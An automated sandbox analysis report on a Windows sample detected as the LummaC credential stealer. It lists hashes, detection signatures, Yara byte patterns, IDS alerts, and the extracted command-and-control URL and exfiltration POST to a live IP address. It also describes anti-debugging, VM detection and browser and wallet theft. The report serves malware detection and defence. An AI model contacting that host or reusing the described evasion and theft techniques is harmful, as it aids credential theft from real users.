Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
I2BJhmJou4.exe

Overview

General Information

Sample name:I2BJhmJou4.exe
renamed because original name is a hash value
Original sample name:16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962.exe
Analysis ID:1555044
MD5:c847cb3090530ec9ae2e82805a03360d
SHA1:a7f075ba37961545ae0a819bda5d2be28618d60d
SHA256:16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • I2BJhmJou4.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\I2BJhmJou4.exe" MD5: C847CB3090530EC9AE2E82805A03360D)
    • WerFault.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf00:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.I2BJhmJou4.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.2.I2BJhmJou4.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.3.I2BJhmJou4.exe.49f0000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T10:54:22.079039+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849706TCP
                  2024-11-13T10:54:59.967146+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849711TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T10:53:30.089830+010020432061A Network Trojan was detected192.168.2.84971394.158.244.6980TCP
                  2024-11-13T10:53:30.089830+010020432061A Network Trojan was detected192.168.2.84970894.158.244.6980TCP
                  2024-11-13T10:54:34.362378+010020432061A Network Trojan was detected192.168.2.84970794.158.244.6980TCP
                  2024-11-13T10:54:53.135143+010020432061A Network Trojan was detected192.168.2.84970994.158.244.6980TCP
                  2024-11-13T10:55:02.213728+010020432061A Network Trojan was detected192.168.2.84971094.158.244.6980TCP
                  2024-11-13T10:55:10.989197+010020432061A Network Trojan was detected192.168.2.84971294.158.244.6980TCP
                  2024-11-13T10:55:29.613117+010020432061A Network Trojan was detected192.168.2.84971494.158.244.6980TCP
                  2024-11-13T10:55:30.349548+010020432061A Network Trojan was detected192.168.2.84971594.158.244.6980TCP
                  2024-11-13T10:55:48.326883+010020432061A Network Trojan was detected192.168.2.84971694.158.244.6980TCP
                  2024-11-13T10:55:57.094150+010020432061A Network Trojan was detected192.168.2.84971794.158.244.6980TCP
                  2024-11-13T10:56:06.203781+010020432061A Network Trojan was detected192.168.2.84971894.158.244.6980TCP
                  2024-11-13T10:56:15.057549+010020432061A Network Trojan was detected192.168.2.84971994.158.244.6980TCP
                  2024-11-13T10:56:23.838414+010020432061A Network Trojan was detected192.168.2.84972094.158.244.6980TCP
                  2024-11-13T10:56:32.618908+010020432061A Network Trojan was detected192.168.2.84972194.158.244.6980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T10:55:30.349548+010028438641A Network Trojan was detected192.168.2.84971594.158.244.6980TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                  Multi AV Scanner detection for submitted file
                  Source: I2BJhmJou4.exeReversingLabs: Detection: 84%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: I2BJhmJou4.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeUnpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack
                  Source: I2BJhmJou4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F22223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02F22223
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F2216F FindFirstFileExW,0_2_02F2216F

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49710 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49716 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49721 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49714 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49712 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49718 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49717 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49719 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49709 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49720 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49707 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49715 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49715 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49713 -> 94.158.244.69:80
                  Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49708 -> 94.158.244.69:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                  Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                  Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49711
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49706
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                  Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16465Host: 94.158.244.69
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/%OB
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/KH0
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005CAF000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockab?
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socklb:
                  Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/oH
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/yH
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B81C0_2_0040B81C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004340800_2_00434080
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040E14E0_2_0040E14E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040A9280_2_0040A928
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040B1290_2_0040B129
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042B9C50_2_0042B9C5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004069A10_2_004069A1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041F9A40_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041C2700_2_0041C270
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042F2780_2_0042F278
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040620B0_2_0040620B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004302280_2_00430228
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004052D90_2_004052D9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00436ADC0_2_00436ADC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00405AAA0_2_00405AAA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043B3620_2_0043B362
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004024760_2_00402476
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042FD350_2_0042FD35
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042AD820_2_0042AD82
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042D6580_2_0042D658
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00430E6C0_2_00430E6C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00438E280_2_00438E28
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041204D0_2_0041204D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004410570_2_00441057
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004150700_2_00415070
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004488000_2_00448800
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0043D8D00_2_0043D8D0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041E0830_2_0041E083
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044915B0_2_0044915B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0045D15A0_2_0045D15A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041316D0_2_0041316D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040112C0_2_0040112C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004279E00_2_004279E0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041D1E90_2_0041D1E9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004109FC0_2_004109FC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0040D9940_2_0040D994
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044F2440_2_0044F244
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041AA490_2_0041AA49
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0041B2510_2_0041B251
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00429A5B0_2_00429A5B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_004102180_2_00410218
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00410A330_2_00410A33
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_00414A830_2_00414A83
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_0044234A0_2_0044234A
